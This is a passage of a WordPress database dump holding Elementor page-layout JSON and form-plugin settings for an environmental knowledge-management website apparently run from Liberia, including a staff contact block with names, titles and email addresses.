ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(16056,2427,'usp_shortcode','[usp_form id=\"submit\"]'),(16057,2427,'[usp_custom_field form=\"2427\" id=\"1\"]','data-required#true'),(16058,2427,'[usp_custom_field form=\"2427\" id=\"2\"]','data-required#true'),(16059,2427,'[usp_custom_field form=\"2427\" id=\"3\"]','data-required#true'),(16060,2428,'usp_shortcode','[usp_form id=\"contact\"]'),(16061,2428,'[usp_custom_field form=\"2428\" id=\"1\"]','data-required#true'),(16062,2428,'[usp_custom_field form=\"2428\" id=\"2\"]','data-required#true'),(16063,2428,'[usp_custom_field form=\"2428\" id=\"3\"]','data-required#true'),(16064,2429,'usp_shortcode','[usp_form id=\"register\"]'),(16065,2429,'[usp_custom_field form=\"register\" id=\"1\"]','name#nicename|for#nicename|label#Nicename|placeholder#Nicename'),(16066,2429,'[usp_custom_field form=\"register\" id=\"2\"]','name#displayname|for#displayname|label#Display Name|placeholder#Display Name'),(16067,2429,'[usp_custom_field form=\"register\" id=\"3\"]','name#nickname|for#nickname|label#Nickname|placeholder#Nickname'),(16068,2429,'[usp_custom_field form=\"register\" id=\"4\"]','name#firstname|for#firstname|label#First Name|placeholder#First Name'),(16069,2429,'[usp_custom_field form=\"register\" id=\"5\"]','name#lastname|for#lastname|label#Last Name|placeholder#Last Name'),(16070,2429,'[usp_custom_field form=\"register\" id=\"6\"]','name#description|for#description|label#Description|placeholder#Description'),(16071,2430,'usp_shortcode','[usp_form id=\"preview\"]'),(16072,2430,'[usp_custom_field form=\"2430\" id=\"1\"]','data-required#true'),(16073,2430,'[usp_custom_field form=\"2430\" id=\"2\"]','data-required#true'),(16074,2430,'[usp_custom_field form=\"2430\" id=\"3\"]','data-required#true'),(16075,2431,'usp_shortcode','[usp_form id=\"classic\"]'),(16076,2431,'[usp_custom_field form=\"2431\" id=\"1\"]','data-required#true'),(16077,2431,'[usp_custom_field form=\"2431\" id=\"2\"]','data-required#true'),(16078,2431,'[usp_custom_field form=\"2431\" id=\"3\"]','data-required#true'),(16079,2432,'usp_shortcode','[usp_form id=\"starter\"]'),(16080,2432,'[usp_custom_field form=\"starter\" id=\"1\"]','field#input_checkbox|desc#Checkboxes|checkboxes#Option 1:Option 2:Option 3|checkboxes_checked#Option 1|data-required#false'),(16081,2432,'[usp_custom_field form=\"starter\" id=\"2\"]','field#input_radio|desc#Radio Field|radio_inputs#Option 1:Option 2:Option 3|radio_checked#Option 1|data-required#false'),(16082,2432,'[usp_custom_field form=\"starter\" id=\"3\"]','field#select|label#Select Field|options#null:Option 1:Option 2:Option 3|option_default#Please Select..|option_select#null|data-required#false'),(16083,2432,'[usp_custom_field form=\"starter\" id=\"4\"]','label#Text Field|placeholder#Text Field|data-required#false'),(16084,2432,'[usp_custom_field form=\"starter\" id=\"5\"]','field#textarea|label#Textarea|placeholder#Textarea|data-required#false'),(16085,2432,'[usp_custom_field form=\"starter\" id=\"6\"]','field#input_file|label#Custom Files|multiple#true|data-required#false'),(16095,2428,'_edit_lock','1574535576:1'),(16096,2428,'_edit_last','1'),(16097,2434,'_wp_page_template','elementor_canvas'),(16098,2434,'_elementor_edit_mode','builder'),(16099,2434,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(16100,2434,'_elementor_version','2.7.5'),(16101,2434,'_elementor_template_type','wp-post'),(16105,2435,'_wp_page_template','elementor_canvas'),(16106,2435,'_elementor_edit_mode','builder'),(16107,2435,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(16108,2435,'_elementor_version','2.7.5'),(16109,2435,'_elementor_template_type','wp-post'),(16112,2436,'_wp_page_template','elementor_canvas'),(16113,2436,'_elementor_edit_mode','builder'),(16114,2436,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px